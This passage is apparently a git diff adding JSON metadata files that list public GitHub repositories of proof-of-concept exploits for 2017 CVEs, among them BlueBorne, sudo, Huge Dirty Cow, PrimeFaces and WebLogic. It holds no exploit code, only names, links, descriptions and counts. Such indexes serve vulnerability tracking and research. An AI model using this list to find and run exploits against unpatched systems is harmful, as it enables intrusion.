"avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7850039?v=4", + "html_url": "https:\/\/github.com\/own2pwn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/own2pwn\/blueborne-CVE-2017-1000251-POC", + "description": null, + "fork": false, + "created_at": "2017-10-01T10:15:40Z", + "updated_at": "2022-03-03T11:07:21Z", + "pushed_at": "2017-10-01T10:23:36Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 519767694, + "name": "CVE-2017-1000251_Exploit", + "full_name": "istanescu\/CVE-2017-1000251_Exploit", + "owner": { + "login": "istanescu", + "id": 57217001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57217001?v=4", + "html_url": "https:\/\/github.com\/istanescu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/istanescu\/CVE-2017-1000251_Exploit", + "description": "PoC exploit for CVE-2017-1000251 (modified)", + "fork": false, + "created_at": "2022-07-31T12:17:41Z", + "updated_at": "2022-08-15T14:25:43Z", + "pushed_at": "2022-08-15T14:28:33Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 823636368, + "name": "blueborne-CVE-2017-1000251", + "full_name": "sgxgsx\/blueborne-CVE-2017-1000251", + "owner": { + "login": "sgxgsx", + "id": 33176446, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33176446?v=4", + "html_url": "https:\/\/github.com\/sgxgsx", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sgxgsx\/blueborne-CVE-2017-1000251", + "description": "Linux Kernel < 4.13.1 - BlueTooth Buffer Overflow (PoC) BlueBorne - Proof of Concept - Unarmed\/Unweaponized - DoS (Crash) only ", + "fork": false, + "created_at": "2024-07-03T12:14:00Z", + "updated_at": "2024-09-05T18:02:23Z", + "pushed_at": "2024-07-03T12:16:23Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000253.json b/2017/CVE-2017-1000253.json new file mode 100644 index 0000000000..8eb3abc01a --- /dev/null +++ b/2017/CVE-2017-1000253.json @@ -0,0 +1,66 @@ +[ + { + "id": 137769369, + "name": "PIE-Stack-Clash-CVE-2017-1000253", + "full_name": "RicterZ\/PIE-Stack-Clash-CVE-2017-1000253", + "owner": { + "login": "RicterZ", + "id": 5282759, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5282759?v=4", + "html_url": "https:\/\/github.com\/RicterZ", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RicterZ\/PIE-Stack-Clash-CVE-2017-1000253", + "description": "Demo-ing CVE-2017-1000253 in a container", + "fork": false, + "created_at": "2018-06-18T15:22:01Z", + "updated_at": "2023-06-01T08:36:39Z", + "pushed_at": "2017-11-01T07:59:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 7, + "watchers": 5, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 552591833, + "name": "CVE-2017-1000253", + "full_name": "sxlmnwb\/CVE-2017-1000253", + "owner": { + "login": "sxlmnwb", + "id": 65052912, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65052912?v=4", + "html_url": "https:\/\/github.com\/sxlmnwb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sxlmnwb\/CVE-2017-1000253", + "description": "Linux Kernel 3.10.0-514.21.2.el7.x86_64 \/ 3.10.0-514.26.1.el7.x86_64 (CentOS 7) - SUID Position Independent Executable 'PIE' Local Privilege Escalation", + "fork": false, + "created_at": "2022-10-16T23:08:16Z", + "updated_at": "2022-11-03T15:16:30Z", + "pushed_at": "2022-10-16T23:22:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2017-1000253" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000353.json b/2017/CVE-2017-1000353.json new file mode 100644 index 0000000000..65de4eaa84 --- /dev/null +++ b/2017/CVE-2017-1000353.json @@ -0,0 +1,64 @@ +[ + { + "id": 181013087, + "name": "CVE-2017-1000353", + "full_name": "vulhub\/CVE-2017-1000353", + "owner": { + "login": "vulhub", + "id": 28655782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/28655782?v=4", + "html_url": "https:\/\/github.com\/vulhub", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulhub\/CVE-2017-1000353", + "description": "jenkins CVE-2017-1000353 POC", + "fork": false, + "created_at": "2019-04-12T13:24:26Z", + "updated_at": "2024-08-12T19:47:51Z", + "pushed_at": "2020-06-11T00:16:40Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 64, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 64, + "watchers": 54, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 550150215, + "name": "Jenkins-CVE-2017-1000353", + "full_name": "r00t4dm\/Jenkins-CVE-2017-1000353", + "owner": { + "login": "r00t4dm", + "id": 36941976, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36941976?v=4", + "html_url": "https:\/\/github.com\/r00t4dm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/r00t4dm\/Jenkins-CVE-2017-1000353", + "description": null, + "fork": false, + "created_at": "2022-10-12T09:30:38Z", + "updated_at": "2023-07-17T15:13:46Z", + "pushed_at": "2022-10-12T09:36:21Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000367.json b/2017/CVE-2017-1000367.json new file mode 100644 index 0000000000..8e0f563c28 --- /dev/null +++ b/2017/CVE-2017-1000367.json @@ -0,0 +1,95 @@ +[ + { + "id": 92862379, + "name": "sudo-CVE-2017-1000367", + "full_name": "c0d3z3r0\/sudo-CVE-2017-1000367", + "owner": { + "login": "c0d3z3r0", + "id": 6205797, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6205797?v=4", + "html_url": "https:\/\/github.com\/c0d3z3r0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0d3z3r0\/sudo-CVE-2017-1000367", + "description": null, + "fork": false, + "created_at": "2017-05-30T18:12:38Z", + "updated_at": "2024-08-12T19:30:13Z", + "pushed_at": "2017-06-05T19:53:35Z", + "stargazers_count": 112, + "watchers_count": 112, + "has_discussions": false, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 44, + "watchers": 112, + "score": 0, + "subscribers_count": 11 + }, + { + "id": 93312242, + "name": "CVE-2017-1000367", + "full_name": "homjxi0e\/CVE-2017-1000367", + "owner": { + "login": "homjxi0e", + "id": 25440152, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25440152?v=4", + "html_url": "https:\/\/github.com\/homjxi0e", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/homjxi0e\/CVE-2017-1000367", + "description": null, + "fork": false, + "created_at": "2017-06-04T12:31:59Z", + "updated_at": "2022-11-09T17:57:13Z", + "pushed_at": "2017-06-04T12:49:02Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 93726308, + "name": "sudo_exploit", + "full_name": "pucerpocok\/sudo_exploit", + "owner": { + "login": "pucerpocok", + "id": 25666150, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25666150?v=4", + "html_url": "https:\/\/github.com\/pucerpocok", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pucerpocok\/sudo_exploit", + "description": "own implementation of the CVE-2017-1000367 sudo privilege escalation vulnerability in python", + "fork": false, + "created_at": "2017-06-08T08:37:38Z", + "updated_at": "2021-01-29T04:26:08Z", + "pushed_at": "2017-06-08T08:38:49Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 6, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000371.json b/2017/CVE-2017-1000371.json new file mode 100644 index 0000000000..04654a8a55 --- /dev/null +++ b/2017/CVE-2017-1000371.json @@ -0,0 +1,33 @@ +[ + { + "id": 596439217, + "name": "linux-4.1.15_CVE-2017-1000371", + "full_name": "Trinadh465\/linux-4.1.15_CVE-2017-1000371", + "owner": { + "login": "Trinadh465", + "id": 102574296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102574296?v=4", + "html_url": "https:\/\/github.com\/Trinadh465", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trinadh465\/linux-4.1.15_CVE-2017-1000371", + "description": null, + "fork": false, + "created_at": "2023-02-02T07:22:19Z", + "updated_at": "2023-03-08T01:49:42Z", + "pushed_at": "2023-02-02T07:29:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000405.json b/2017/CVE-2017-1000405.json new file mode 100644 index 0000000000..39b0688ba0 --- /dev/null +++ b/2017/CVE-2017-1000405.json @@ -0,0 +1,33 @@ +[ + { + "id": 112534496, + "name": "HugeDirtyCowPOC", + "full_name": "bindecy\/HugeDirtyCowPOC", + "owner": { + "login": "bindecy", + "id": 33990073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/33990073?v=4", + "html_url": "https:\/\/github.com\/bindecy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bindecy\/HugeDirtyCowPOC", + "description": "A POC for the Huge Dirty Cow vulnerability (CVE-2017-1000405)", + "fork": false, + "created_at": "2017-11-29T22:19:51Z", + "updated_at": "2024-08-12T19:34:25Z", + "pushed_at": "2017-11-30T00:24:14Z", + "stargazers_count": 202, + "watchers_count": 202, + "has_discussions": false, + "forks_count": 62, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 62, + "watchers": 202, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000475.json b/2017/CVE-2017-1000475.json new file mode 100644 index 0000000000..0250ab5cdc --- /dev/null +++ b/2017/CVE-2017-1000475.json @@ -0,0 +1,33 @@ +[ + { + "id": 118515767, + "name": "CVE-2017-1000475", + "full_name": "lajarajorge\/CVE-2017-1000475", + "owner": { + "login": "lajarajorge", + "id": 35707370, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35707370?v=4", + "html_url": "https:\/\/github.com\/lajarajorge", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/lajarajorge\/CVE-2017-1000475", + "description": "Unquoted Path Service", + "fork": false, + "created_at": "2018-01-22T21:10:22Z", + "updated_at": "2018-01-22T21:10:22Z", + "pushed_at": "2018-01-22T21:34:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000486.json b/2017/CVE-2017-1000486.json new file mode 100644 index 0000000000..0992314270 --- /dev/null +++ b/2017/CVE-2017-1000486.json @@ -0,0 +1,228 @@ +[ + { + "id": 147145369, + "name": "CVE-2017-1000486", + "full_name": "pimps\/CVE-2017-1000486", + "owner": { + "login": "pimps", + "id": 11393266, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11393266?v=4", + "html_url": "https:\/\/github.com\/pimps", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pimps\/CVE-2017-1000486", + "description": "Primefaces <= 5.2.21, 5.3.8 or 6.0 - Remote Code Execution Exploit", + "fork": false, + "created_at": "2018-09-03T03:11:24Z", + "updated_at": "2024-10-27T16:31:54Z", + "pushed_at": "2024-02-27T11:56:02Z", + "stargazers_count": 88, + "watchers_count": 88, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 88, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 153533103, + "name": "CVE-2017-1000486", + "full_name": "mogwailabs\/CVE-2017-1000486", + "owner": { + "login": "mogwailabs", + "id": 40667088, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40667088?v=4", + "html_url": "https:\/\/github.com\/mogwailabs", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mogwailabs\/CVE-2017-1000486", + "description": "Proof of Concept Exploit for PrimeFaces 5.x EL Injection (CVE-2017-1000486)", + "fork": false, + "created_at": "2018-10-17T22:47:30Z", + "updated_at": "2023-06-06T14:57:31Z", + "pushed_at": "2022-09-09T13:50:49Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 9, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 165310451, + "name": "cve-2017-1000486", + "full_name": "cved-sources\/cve-2017-1000486", + "owner": { + "login": "cved-sources", + "id": 46423677, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cved-sources\/cve-2017-1000486", + "description": "cve-2017-1000486", + "fork": false, + "created_at": "2019-01-11T21:11:14Z", + "updated_at": "2021-04-15T21:22:34Z", + "pushed_at": "2021-04-15T21:22:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 393127180, + "name": "CVE-2017-1000486", + "full_name": "Pastea\/CVE-2017-1000486", + "owner": { + "login": "Pastea", + "id": 24623933, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/24623933?v=4", + "html_url": "https:\/\/github.com\/Pastea", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Pastea\/CVE-2017-1000486", + "description": null, + "fork": false, + "created_at": "2021-08-05T17:42:54Z", + "updated_at": "2023-06-06T15:01:35Z", + "pushed_at": "2022-02-23T11:38:11Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 534832544, + "name": "pwnfaces", + "full_name": "oppsec\/pwnfaces", + "owner": { + "login": "oppsec", + "id": 50470310, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50470310?v=4", + "html_url": "https:\/\/github.com\/oppsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oppsec\/pwnfaces", + "description": "😛 Primefaces 5.X EL Injection Exploit (CVE-2017-1000486)", + "fork": false, + "created_at": "2022-09-09T23:09:40Z", + "updated_at": "2024-08-30T15:07:20Z", + "pushed_at": "2023-04-18T14:03:27Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2017-1000486", + "elinjection", + "exploit", + "golang", + "linux", + "primefaces", + "redteam" + ], + "visibility": "public", + "forks": 3, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 731812910, + "name": "CVE-2017-1000486", + "full_name": "LongWayHomie\/CVE-2017-1000486", + "owner": { + "login": "LongWayHomie", + "id": 63229183, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63229183?v=4", + "html_url": "https:\/\/github.com\/LongWayHomie", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LongWayHomie\/CVE-2017-1000486", + "description": "Remote Code Execution exploit for PrimeFaces 5.x - EL Injection (CVE-2017-1000486)", + "fork": false, + "created_at": "2023-12-15T00:04:21Z", + "updated_at": "2023-12-15T00:06:20Z", + "pushed_at": "2023-12-15T00:11:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 757165980, + "name": "primefaces", + "full_name": "jam620\/primefaces", + "owner": { + "login": "jam620", + "id": 17382838, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17382838?v=4", + "html_url": "https:\/\/github.com\/jam620", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jam620\/primefaces", + "description": "Explotación CVE-2017-1000486", + "fork": false, + "created_at": "2024-02-13T23:33:16Z", + "updated_at": "2024-02-13T23:33:16Z", + "pushed_at": "2024-02-13T23:47:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1000499.json b/2017/CVE-2017-1000499.json new file mode 100644 index 0000000000..5339f76748 --- /dev/null +++ b/2017/CVE-2017-1000499.json @@ -0,0 +1,33 @@ +[ + { + "id": 164232365, + "name": "5MMISSI-CVE-2017-1000499", + "full_name": "Villaquiranm\/5MMISSI-CVE-2017-1000499", + "owner": { + "login": "Villaquiranm", + "id": 22179290, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22179290?v=4", + "html_url": "https:\/\/github.com\/Villaquiranm", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Villaquiranm\/5MMISSI-CVE-2017-1000499", + "description": null, + "fork": false, + "created_at": "2019-01-05T16:33:08Z", + "updated_at": "2019-01-13T11:38:09Z", + "pushed_at": "2019-01-13T11:38:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-1002101.json b/2017/CVE-2017-1002101.json new file mode 100644 index 0000000000..d4f330f8c4 --- /dev/null +++ b/2017/CVE-2017-1002101.json @@ -0,0 +1,33 @@ +[ + { + "id": 126385112, + "name": "subpath-exploit", + "full_name": "bgeesaman\/subpath-exploit", + "owner": { + "login": "bgeesaman", + "id": 3769609, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3769609?v=4", + "html_url": "https:\/\/github.com\/bgeesaman", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bgeesaman\/subpath-exploit", + "description": "Writeup of CVE-2017-1002101 with sample \"exploit\"\/escape", + "fork": false, + "created_at": "2018-03-22T19:26:12Z", + "updated_at": "2023-03-21T12:30:57Z", + "pushed_at": "2018-03-23T13:41:20Z", + "stargazers_count": 35, + "watchers_count": 35, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 35, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10235.json b/2017/CVE-2017-10235.json new file mode 100644 index 0000000000..f13187c6b7 --- /dev/null +++ b/2017/CVE-2017-10235.json @@ -0,0 +1,33 @@ +[ + { + "id": 104800054, + "name": "vbox_cve_2017_10235", + "full_name": "fundacion-sadosky\/vbox_cve_2017_10235", + "owner": { + "login": "fundacion-sadosky", + "id": 30127931, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/30127931?v=4", + "html_url": "https:\/\/github.com\/fundacion-sadosky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fundacion-sadosky\/vbox_cve_2017_10235", + "description": "[CVE-2017-10235] Description and PoC of VirtualBox E1000 device Buffer Overflow", + "fork": false, + "created_at": "2017-09-25T20:42:47Z", + "updated_at": "2023-12-20T23:49:35Z", + "pushed_at": "2018-01-15T19:26:45Z", + "stargazers_count": 34, + "watchers_count": 34, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 34, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2017/CVE-2017-10271.json b/2017/CVE-2017-10271.json new file mode 100644 index 0000000000..b746d440dc --- /dev/null +++ b/2017/CVE-2017-10271.json @@ -0,0 +1,854 @@ +[ + { + "id": 115195951, + "name": "CVE-2017-10271", + "full_name": "1337g\/CVE-2017-10271", + "owner": { + "login": "1337g", + "id": 32504404, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32504404?v=4", + "html_url": "https:\/\/github.com\/1337g", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/1337g\/CVE-2017-10271", + "description": "CVE-2017-10271 WEBLOGIC RCE (TESTED)", + "fork": false, + "created_at": "2017-12-23T13:04:23Z", + "updated_at": "2024-08-12T19:34:59Z", + "pushed_at": "2017-12-23T13:12:06Z", + "stargazers_count": 37, + "watchers_count": 37, + "has_discussions": false, + "forks_count": 27, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 27, + "watchers": 37, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 115311346, + "name": "CVE-2017-10271", + "full_name": "s3xy\/CVE-2017-10271", + "owner": { + "login": "s3xy", + "id": 34327996, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34327996?v=4", + "html_url": "https:\/\/github.com\/s3xy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s3xy\/CVE-2017-10271", + "description": "Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server.", + "fork": false, + "created_at": "2017-12-25T06:11:54Z", + "updated_at": "2024-08-12T19:35:01Z", + "pushed_at": "2017-12-25T06:21:23Z", + "stargazers_count": 22, + "watchers_count": 22, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 9, + "watchers": 22, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 115339400, + "name": "PoCs-Weblogic_2017_10271", + "full_name": "ZH3FENG\/PoCs-Weblogic_2017_10271", + "owner": { + "login": "ZH3FENG", + "id": 20502660, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20502660?v=4", + "html_url": "https:\/\/github.com\/ZH3FENG", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ZH3FENG\/PoCs-Weblogic_2017_10271", + "description": "Simplified PoC for Weblogic-CVE-2017-10271", + "fork": false, + "created_at": "2017-12-25T13:18:45Z", + "updated_at": "2019-03-19T07:31:45Z", + "pushed_at": "2017-12-25T13:23:32Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 115571903, + "name": "CVE-2017-10271", + "full_name": "c0mmand3rOpSec\/CVE-2017-10271", + "owner": { + "login": "c0mmand3rOpSec", + "id": 17217255, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17217255?v=4", + "html_url": "https:\/\/github.com\/c0mmand3rOpSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0mmand3rOpSec\/CVE-2017-10271", + "description": "WebLogic Exploit", + "fork": false, + "created_at": "2017-12-28T01:30:50Z", + "updated_at": "2024-08-12T19:35:04Z", + "pushed_at": "2018-07-13T18:56:53Z", + "stargazers_count": 141, + "watchers_count": 141, + "has_discussions": false, + "forks_count": 46, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 46, + "watchers": 141, + "score": 0, + "subscribers_count": 9 + }, + { + "id": 115596796, + "name": "CVE-2017-10271", + "full_name": "Luffin\/CVE-2017-10271", + "owner": { + "login": "Luffin", + "id": 13807870, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13807870?v=4", + "html_url": "https:\/\/github.com\/Luffin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Luffin\/CVE-2017-10271", + "description": "CVE-2017-10271 POC", + "fork": false, + "created_at": "2017-12-28T07:19:13Z", + "updated_at": "2023-02-16T07:47:59Z", + "pushed_at": "2018-01-10T02:34:56Z", + "stargazers_count": 29, + "watchers_count": 29, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 29, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 116099094, + "name": "weblogic_wls_wsat_rce", + "full_name": "cjjduck\/weblogic_wls_wsat_rce", + "owner": { + "login": "cjjduck", + "id": 23519154, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23519154?v=4", + "html_url": "https:\/\/github.com\/cjjduck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cjjduck\/weblogic_wls_wsat_rce", + "description": "forked from https:\/\/github.com\/s3xy\/CVE-2017-10271. Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.Modified by hanc00l", + "fork": false, + "created_at": "2018-01-03T06:14:28Z", + "updated_at": "2020-10-09T02:33:00Z", + "pushed_at": "2018-01-03T00:42:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 40, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 40, + "watchers": 3, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 116430643, + "name": "CVE-2017-10271", + "full_name": "kkirsche\/CVE-2017-10271", + "owner": { + "login": "kkirsche", + "id": 947110, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/947110?v=4", + "html_url": "https:\/\/github.com\/kkirsche", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kkirsche\/CVE-2017-10271", + "description": "Oracle WebLogic WLS-WSAT Remote Code Execution Exploit (CVE-2017-10271)", + "fork": false, + "created_at": "2018-01-05T21:57:03Z", + "updated_at": "2024-08-12T19:35:18Z", + "pushed_at": "2022-09-16T12:53:46Z", + "stargazers_count": 125, + "watchers_count": 125, + "has_discussions": false, + "forks_count": 42, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 42, + "watchers": 125, + "score": 0, + "subscribers_count": 7 + }, + { + "id": 117624791, + "name": "CVE-2017-10271", + "full_name": "pssss\/CVE-2017-10271", + "owner": { + "login": "pssss", + "id": 14834109, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14834109?v=4", + "html_url": "https:\/\/github.com\/pssss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pssss\/CVE-2017-10271", + "description": "CVE-2017-10271 Weblogic 漏洞验证Poc及补丁", + "fork": false, + "created_at": "2018-01-16T03:10:48Z", + "updated_at": "2024-06-06T03:25:54Z", + "pushed_at": "2020-01-20T06:37:56Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + 